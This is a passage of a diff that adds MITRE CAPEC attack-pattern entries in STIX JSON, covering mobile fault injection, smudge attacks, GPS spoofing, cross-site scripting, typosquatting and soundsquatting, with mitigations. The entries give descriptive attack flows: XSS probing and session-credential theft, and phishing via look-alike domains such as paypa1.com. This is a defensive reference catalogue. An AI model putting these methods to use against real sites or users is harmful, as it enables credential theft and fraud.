laser pulses, clock glitches, etc.) to cause faulty behavior. When performed in a controlled manner on devices performing cryptographic operations, this faulty behavior can be exploited to derive secret key information. 
Although this attack usually requires physical control of the mobile device, it is non-destructive, and the device can be used after the attack without any indication that secret keys were compromised.", + "external_references": [ + { + "external_id": "CAPEC-625", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/625.html" + }, + { + "external_id": "CWE-1247", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1247.html" + }, + { + "external_id": "CWE-1248", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1248.html" + }, + { + "external_id": "CWE-1256", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1256.html" + }, + { + "external_id": "CWE-1319", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1319.html" + }, + { + "external_id": "CWE-1332", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1332.html" + }, + { + "external_id": "CWE-1334", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1334.html" + }, + { + "external_id": "CWE-1338", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1338.html" + }, + { + "external_id": "CWE-1351", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1351.html" + } + ], + "id": "attack-pattern--48ba5f20-2888-4a0c-8cc6-28631533f255", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Mobile Device Fault Injection", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--965d88fd-a632-4960-b4ba-7521878a0ba3" + ], + "x_capec_consequences": { + "Access_Control": [ + "Read Data (Extract long-term secret keys (e.g. 
keys used for VPN or WiFi authentication and encryption) to enable decryption of intercepted VOIP traffic.)" + ], + "Confidentiality": [ + "Read Data (Extract long-term secret keys (e.g. keys used for VPN or WiFi authentication and encryption) to enable decryption of intercepted VOIP traffic.)" + ] + }, + "x_capec_domains": [ + "Communications", + "Hardware" + ], + "x_capec_skills_required": { + "High": "Adversaries require non-trivial technical skills to create and implement fault injection attacks on mobile devices. Although this style of attack has become easier (commercial equipment and training classes are available to perform these attacks), they usual require significant setup and experimentation time during which physical access to the device is required. This prerequisite makes the attack challenging to perform (assuming that physical security countermeasures and monitoring are in place)." + }, + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--224113f1-e834-46f3-9de8-b99b4daabd5a", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--076b471c-60c6-41a5-9266-e34cc546bfcd", + "spec_version": "2.1", + "target_ref": "attack-pattern--48ba5f20-2888-4a0c-8cc6-28631533f255", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Frequent changes to secret keys and certificates.", + "id": "course-of-action--b219b8f8-c28d-470b-8031-48f247b21a37", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-625-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": 
"course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--11480983-629b-48d4-bb0d-9b7bede4d597", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b219b8f8-c28d-470b-8031-48f247b21a37", + "spec_version": "2.1", + "target_ref": "attack-pattern--48ba5f20-2888-4a0c-8cc6-28631533f255", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Attacks that reveal the password/passcode pattern on a touchscreen device by detecting oil smudges left behind by the user’s fingers.", + "external_references": [ + { + "external_id": "CAPEC-626", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/626.html" + } + ], + "id": "attack-pattern--0fda524b-2218-4aec-bf3e-6f345d13e459", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Smudge Attack", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--5e808864-44b1-478c-8cb0-75c55cd51e2b" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ] + }, + "x_capec_domains": [ + "Physical Security" + ], + "x_capec_prerequisites": [ + "The attacker must have physical access to the device." + ], + "x_capec_skills_required": { + "Medium": "The attacker must know how to make use of these smudges." 
+ }, + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Strong physical security of the device.", + "id": "course-of-action--03c24d78-8f14-4663-b2ab-fdbbdac190bb", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-626-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--1f1608da-3175-4247-965b-9dee8d21b05f", + "modified": "2019-09-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--03c24d78-8f14-4663-b2ab-fdbbdac190bb", + "spec_version": "2.1", + "target_ref": "attack-pattern--0fda524b-2218-4aec-bf3e-6f345d13e459", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary attempts to deceive a GPS receiver by broadcasting counterfeit GPS signals, structured to resemble a set of normal GPS signals. 
These spoofed signals may be structured in such a way as to cause the receiver to estimate its position to be somewhere other than where it actually is, or to be located where it is but at a different time, as determined by the adversary.", + "external_references": [ + { + "external_id": "CAPEC-627", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/627.html" + } + ], + "id": "attack-pattern--2e1be870-6442-4978-9a30-46d518aa1f74", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Counterfeit GPS Signals", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--bd4f8f46-1bc7-40a9-b15a-e36b7671cf5b" + ], + "x_capec_consequences": { + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Communications", + "Hardware" + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_parent_of_refs": [ + "attack-pattern--3b7a108f-f42f-42c7-99be-a16ec15ca0ff" + ], + "x_capec_prerequisites": [ + "The target must be relying on valid GPS signal to perform critical operations." + ], + "x_capec_resources_required": [ + "Ability to create spoofed GPS signals." + ], + "x_capec_skills_required": { + "High": "The ability to spoof GPS signals is not trival." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "A common form of a GPS spoofing attack, commonly termed a carry-off attack begins with an adversary broadcasting signals synchronized with the genuine signals observed by the target receiver. The power of the counterfeit signals is then gradually increased and drawn away from the genuine signals. 
Over time, the adversary can carry the target away from their intended destination and toward a location chosen by the adversary.", + "external_references": [ + { + "external_id": "CAPEC-628", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/628.html" + }, + { + "description": "Wikipedia, The Wikimedia Foundation, Inc", + "external_id": "REF-489", + "source_name": "reference_from_CAPEC", + "url": "https://en.wikipedia.org/wiki/Spoofing_attack#GPS_Spoofing" + } + ], + "id": "attack-pattern--3b7a108f-f42f-42c7-99be-a16ec15ca0ff", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Carry-Off GPS Attack", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--2e1be870-6442-4978-9a30-46d518aa1f74" + ], + "x_capec_domains": [ + "Communications" + ], + "x_capec_example_instances": [ + "A \"proof-of-concept\" attack was successfully performed in June, 2013, when the luxury yacht \"White Rose\" was misdirected with spoofed GPS signals from Monaco to the island of Rhodes by a group of aerospace engineering students from the Cockrell School of Engineering at the University of Texas in Austin. The students were aboard the yacht, allowing their spoofing equipment to gradually overpower the signal strengths of the actual GPS constellation satellites, altering the course of the yacht." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The target must be relying on valid GPS signal to perform critical operations." + ], + "x_capec_skills_required": { + "High": "This attack requires advanced knoweldge in GPS technology." 
+ }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated.", + "external_references": [ + { + "external_id": "CAPEC-629", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/629.html" + } + ], + "id": "attack-pattern--61baa525-b9a3-4474-98d9-7645906e4cc3", + "modified": "2022-09-29T00:00:00.000Z", + "name": "DEPRECATED: Unauthorized Use of Device Resources", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary embeds malicious scripts in content that will be served to web browsers. The goal of the attack is for the target software, the client-side browser, to execute the script with the users' privilege level. An attack of this type exploits a programs' vulnerabilities that are brought on by allowing remote hosts to execute code and scripts. Web browsers, for example, have some simple security controls in place, but if a remote attacker is allowed to execute scripts (through injecting them in to user-generated content like bulletin boards) then these controls may be bypassed. 
Further, these attacks are very difficult for an end user to detect.", + "external_references": [ + { + "external_id": "CAPEC-63", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/63.html" + }, + { + "external_id": "CWE-79", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/79.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "description": "Cross-Site Scripting", + "external_id": "08", + "source_name": "WASC", + "url": "http://projects.webappsec.org/Cross-Site-Scripting" + }, + { + "description": "Cross Site Scripting (XSS)", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/xss" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--70b83583-ffe3-4e6d-b4a6-61a9b9efc346", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Cross-Site Scripting (XSS)", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_follow_refs": [ + "attack-pattern--b89511b6-f0fb-4c1d-a884-a0d5a0d82b4e", + "attack-pattern--8bd0c718-f126-4397-9754-c5225da7b696", + "attack-pattern--ae3f2c33-9018-442e-9cc3-24d65c7f4974", + "attack-pattern--d845a25b-b140-438c-91d7-30b709bb6e18", + "attack-pattern--ba694895-a0cf-494e-ace2-bf3488330b80", + "attack-pattern--94208f8a-f779-4be5-a97b-d9ab781a3f5e" + ], + "x_capec_can_precede_refs": [ + "attack-pattern--f14acee3-770c-4154-a9b2-9eda908c6a9f" + ], + "x_capec_child_of_refs": [ + "attack-pattern--7f0f7de2-bf09-4f60-86bb-6933192b7128" + ], + "x_capec_consequences": { + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Execute Unauthorized 
Commands (Run Arbitrary Code)", + "Read Data" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n Classic phishing attacks lure users to click on content that appears trustworthy, such as logos, and links that seem to go to their trusted financial institutions and online auction sites. But instead the attacker appends malicious scripts into the otherwise innocent appearing resources. The HTML source for a standard phishing attack looks like this:\n maliciousscript\">Trusted Site\n When the user clicks the link, the appended script also executes on the local user's machine.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the application for user-controllable inputs: Using a browser or an automated tool, an attacker follows all public links and actions on a web site. They record all the links, the forms, the resources accessed and all other potential entry-points for the web application.

  2. Techniques
    Use a spidering tool to follow and record all links and analyze the web pages to find entry points. Make special note of any links that include parameters in the URL.
    Use a proxy tool to record all links visited during a manual traversal of the web application.
    Use a browser to manually explore the website and analyze how it is constructed. Many browsers' plugins are available to facilitate the analysis or automate the discovery.

Experiment

  1. Probe identified potential entry points for XSS vulnerability: The attacker uses the entry points gathered in the \"Explore\" phase as a target list and injects various common script payloads to determine if an entry point actually represents a vulnerability and to characterize the extent to which the vulnerability can be exploited.

  2. Techniques
    Use a list of XSS probe strings to inject script in parameters of known URLs. If possible, the probe strings contain a unique identifier.
    Use a proxy tool to record results of manual input of XSS probes in known URLs.
    Use a list of XSS probe strings to inject script into UI entry fields. If possible, the probe strings contain a unique identifier.
    Use a list of XSS probe strings to inject script into resources accessed by the application. If possible, the probe strings contain a unique identifier.

Exploit

  1. Steal session IDs, credentials, page content, etc.: As the attacker succeeds in exploiting the vulnerability, they can choose to steal user's credentials in order to reuse or to analyze them later on.

  2. Techniques
    Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim's browser and sends document information to the attacker.
    Develop malicious JavaScript that injected through vectors identified during the Experiment Phase and takes commands from an attacker's server and then causes the browser to execute appropriately.
  3. Forceful browsing: When the attacker targets the current application or another one (through CSRF vulnerabilities), the user will then be the one who perform the attacks without being aware of it. These attacks are mostly targeting application logic flaws, but it can also be used to create a widespread attack against a particular website on the user's current network (Internet or not).

  4. Techniques
    Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim's browser and performs actions on the same web site
    Develop malicious JavaScript that injected through vectors identified during the Experiment Phase and takes commands from an attacker's server and then causes the browser to execute request to other web sites (especially the web applications that have CSRF vulnerabilities).
  5. Content spoofing: By manipulating the content, the attacker targets the information that the user would like to get from the website.

  6. Techniques
    Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim's browser and exposes attacker-modified invalid information to the user on the current web page.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--b1eef783-daae-494c-a418-cd9ada7cbe8b", + "attack-pattern--61b17787-fe92-427c-9e6a-6311997d7b2a", + "attack-pattern--800f8095-99b6-4bb9-8bc6-8b9727201a2f" + ], + "x_capec_prerequisites": [ + "Target client software must be a client that allows scripting communication from remote hosts, such as a JavaScript-enabled Web Browser." + ], + "x_capec_resources_required": [ + "Ability to deploy a custom hostile service for access by targeted clients. Ability to communicate synchronously or asynchronously with client machine." + ], + "x_capec_skills_required": { + "High": "Exploiting a client side vulnerability to inject malicious scripts into the browser's executable process.", + "Low": "To achieve a redirection and use of less trusted source, an attacker can simply place a script in bulletin board, blog, wiki, or other user-generated content site that are echoed back to other client machines." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5b2e5df5-9856-4289-90c4-ecaa908f4206", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--094a4c09-e49c-422b-b8ec-b51c19dba18c", + "spec_version": "2.1", + "target_ref": "attack-pattern--70b83583-ffe3-4e6d-b4a6-61a9b9efc346", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--9acc276d-8c69-42b8-af78-29193fa00cba", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + 
"relationship_type": "mitigates", + "source_ref": "course-of-action--040cd51a-446a-4612-a9d0-4a90119d5191", + "spec_version": "2.1", + "target_ref": "attack-pattern--70b83583-ffe3-4e6d-b4a6-61a9b9efc346", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--2f74ac5d-bb0a-4f7e-9601-cfc8bac01201", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--97eb8eeb-5e17-4a04-803b-c4de40723fc9", + "spec_version": "2.1", + "target_ref": "attack-pattern--70b83583-ffe3-4e6d-b4a6-61a9b9efc346", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--dabf76e9-8f71-45cd-a775-c1d8040bd5a8", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e9836d98-9116-4902-ba62-2c4fcc7e03c3", + "spec_version": "2.1", + "target_ref": "attack-pattern--70b83583-ffe3-4e6d-b4a6-61a9b9efc346", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--950d64aa-75ae-40ab-993f-9a539cc6ce36", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8a996efc-52e0-4aaf-953a-21c3fe64c64b", + "spec_version": "2.1", + "target_ref": "attack-pattern--70b83583-ffe3-4e6d-b4a6-61a9b9efc346", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + 
"created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e7f5d816-04cc-4ad5-823a-b420121bb86e", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4f20a4a7-cb6a-477b-a12a-13c5e9d03353", + "spec_version": "2.1", + "target_ref": "attack-pattern--70b83583-ffe3-4e6d-b4a6-61a9b9efc346", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c6e23539-a2eb-4b8f-a47e-aac60fb3f876", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--86dea14b-a9d1-461f-a1e0-ff289490c27e", + "spec_version": "2.1", + "target_ref": "attack-pattern--70b83583-ffe3-4e6d-b4a6-61a9b9efc346", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f6b510bd-d7a8-4d02-aef8-cdfb98c31f65", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--fd1a110f-6520-479b-9f42-9c88acdbf90e", + "spec_version": "2.1", + "target_ref": "attack-pattern--70b83583-ffe3-4e6d-b4a6-61a9b9efc346", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary registers a domain name with at least one character different than a trusted domain. 
A TypoSquatting attack takes advantage of instances where a user mistypes a URL (e.g. www.goggle.com) or not does visually verify a URL before clicking on it (e.g. phishing attack). As a result, the user is directed to an adversary-controlled destination. TypoSquatting does not require an attack against the trusted domain or complicated reverse engineering.", + "external_references": [ + { + "external_id": "CAPEC-630", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/630.html" + }, + { + "description": "Nick Nikiforakis, Marco Balduzzi, Lieven Desmet, Frank Piessens, Wouter Joosen, Soundsquatting: Uncovering the Use of Homophones in Domain Squatting, Trend Micro", + "external_id": "REF-491", + "source_name": "reference_from_CAPEC", + "url": "https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-soundsquatting.pdf" + } + ], + "id": "attack-pattern--b6f0fd7e-6068-4557-976c-fd34914b11bf", + "modified": "2022-09-29T00:00:00.000Z", + "name": "TypoSquatting", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_follow_refs": [ + "attack-pattern--a00c2cc2-bd4f-4594-9ec1-b021b62ac896" + ], + "x_capec_can_precede_refs": [ + "attack-pattern--5dec633b-7b10-4bfe-9270-e68b98112285", + "attack-pattern--0d249bf9-13b3-4c13-9423-bcb1ea73c067" + ], + "x_capec_child_of_refs": [ + "attack-pattern--e9d5d2e4-588f-43c1-bc98-73417abbb727" + ], + "x_capec_consequences": { + "Other": [ + "Other (Depending on the intention of the adversary, a successful TypoSquatting attack can be leveraged to execute more complex attacks such as cross-site scripting or stealing account credentials.)" + ] + }, + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_example_instances": [ + "\n An adversary sends an email, impersonating paypal.com, to a user stating that they have just received a money 
transfer and to click the given link to obtain their money.\n However, the link the in email is paypa1.com instead of paypal.com, which the user clicks without fully reading the link.\n The user is directed to the adversary's website, which appears as if it is the legitimate paypal.com login page.\n The user thinks they are logging into their account, but have actually just given their paypal credentials to the adversary. The adversary can now use the user's legitimate paypal credentials to log into the user's account and steal any money which may be in the account.\n TypoSquatting vulnerability allows an adversary to impersonate a trusted domain and trick a user into visiting the malicious website to steal user credentials.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine target website: The adversary first determines which website to impersonate, generally one that is trusted and receives a consistent amount of traffic.

  2. Techniques
    Research popular or high traffic websites.

Experiment

  1. Impersonate trusted domain: In order to impersonate the trusted domain, the adversary needs to register the TypoSquatted URL.

  2. Techniques
    Register the TypoSquatted domain.

Exploit

  1. Deceive user into visiting domain: Finally, the adversary needs to deceive a user into visiting the TypoSquatted domain.

  2. Techniques
    Execute a phishing attack and send a user an e-mail convincing the user to click on a link leading the user to the TypoSquatted domain.
    Assume that a user will incorrectly type the legitimate URL, leading the user to the TypoSquatted domain.
", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "An adversary requires knowledge of popular or high traffic domains, that could be used to deceive potential targets." + ], + "x_capec_skills_required": { + "Low": "Adversaries must be able to register DNS hostnames/URL’s." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0098fae5-dbdf-44cd-a5c0-b5fc9efe3a56", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ba0348be-410d-4fe9-bf0e-bb5e48d5af8b", + "spec_version": "2.1", + "target_ref": "attack-pattern--b6f0fd7e-6068-4557-976c-fd34914b11bf", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Purchase potential TypoSquatted domains and forward to legitimate domain.", + "id": "course-of-action--57146b6f-bca0-47d6-9268-5475bdf66db1", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-630-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c2442a11-1be7-42c6-b9e8-d6e757681156", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--57146b6f-bca0-47d6-9268-5475bdf66db1", + "spec_version": "2.1", + "target_ref": 
"attack-pattern--b6f0fd7e-6068-4557-976c-fd34914b11bf", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary registers a domain name that sounds the same as a trusted domain, but has a different spelling. A SoundSquatting attack takes advantage of a user's confusion of the two words to direct Internet traffic to adversary-controlled destinations. SoundSquatting does not require an attack against the trusted domain or complicated reverse engineering.", + "external_references": [ + { + "external_id": "CAPEC-631", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/631.html" + }, + { + "description": "Nick Nikiforakis, Marco Balduzzi, Lieven Desmet, Frank Piessens, Wouter Joosen, Soundsquatting: Uncovering the Use of Homophones in Domain Squatting, Trend Micro", + "external_id": "REF-491", + "source_name": "reference_from_CAPEC", + "url": "https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-soundsquatting.pdf" + } + ], + "id": "attack-pattern--a2cad567-3a04-4ef3-8b62-25924c93b53f", + "modified": "2022-09-29T00:00:00.000Z", + "name": "SoundSquatting", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_alternate_terms": [ + "Homophone Attack" + ], + "x_capec_can_follow_refs": [ + "attack-pattern--a00c2cc2-bd4f-4594-9ec1-b021b62ac896" + ], + "x_capec_can_precede_refs": [ + "attack-pattern--5dec633b-7b10-4bfe-9270-e68b98112285", + "attack-pattern--0d249bf9-13b3-4c13-9423-bcb1ea73c067" + ], + "x_capec_child_of_refs": [ + "attack-pattern--e9d5d2e4-588f-43c1-bc98-73417abbb727" + ], + "x_capec_consequences": { + "Other": [ + "Other (Depending on the intention of the adversary, a successful SoundSquatting attack can be leveraged 
to execute more complex attacks such as cross-site scripting or stealing account credentials.)" + ] + }, + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_example_instances": [ + "\n An adversary sends an email, impersonating the popular banking website guaranteebanking.com, to a user stating that they have just received a new deposit and to click the given link to confirm the deposit.\n However, the link the in email is guarantybanking.com instead of guaranteebanking.com, which the user clicks without fully reading the link.\n The user is directed to the adversary's website, which appears as if it is the legitimate guaranteebanking.com login page.\n The user thinks they are logging into their account, but have actually just given their guaranteebanking.com credentials to the adversary. The adversary can now use the user's legitimate guaranteebanking.com credentials to log into the user's account and steal any money which may be in the account.See also: SoundSquatting vulnerability allows an adversary to impersonate a trusted domain and leverages a user's confusion between the meaning of two words which are pronounced the same into visiting the malicious website to steal user credentials." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine target website: The adversary first determines which website to impersonate, generally one that is trusted, receives a consistent amount of traffic, and is a homophone.

  2. Techniques
    Research popular or high traffic websites which are also homophones.

Experiment

